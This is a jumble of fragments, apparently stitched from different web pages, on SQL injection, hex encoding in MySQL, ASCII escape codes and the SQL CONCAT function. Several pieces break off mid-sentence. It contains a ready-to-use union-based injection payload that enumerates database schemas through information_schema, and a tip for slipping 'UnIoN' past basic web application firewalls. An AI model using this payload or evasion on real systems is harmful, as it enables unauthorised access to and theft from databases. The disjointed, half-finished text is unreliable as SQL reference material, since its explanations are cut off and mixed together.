As a result, they just used `NULL` values to populate those columns. The real confusion is in the CONCAT(). They are combining 126, 39, database name as hex value, 39, and 126. -- is a MySQL comment; it ignores the rest of your query after it. Judging from this attack...
Syntax: 0xHEX_NUMBER (SM): SELECT CHAR(0x66) (S) SELECT 0x5045 (this is not a number, but
Common ASCII codes to know: nul, null byte, \0 (zero); bel, bel character, \a; bs, backspace, \b; ht, horizontal tab, \t; np, formfeed, \f; nl, newline, \n; cr, carriage return, \r.
SELECT CONVERT(char(8), 0x4E616d65, 0) AS [Style 0, binary to character]
Query: ?param=' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9
Instead of union: UnIoN. In some basic WAFs this will work.
SELECT CONCAT("SQL ", "Tutorial ", "is ", "fun!") AS ConcatenatedString; Definition and Usage. The CONCAT() function adds two or more expressions together. Note: Also look at the CONCAT_WS() function.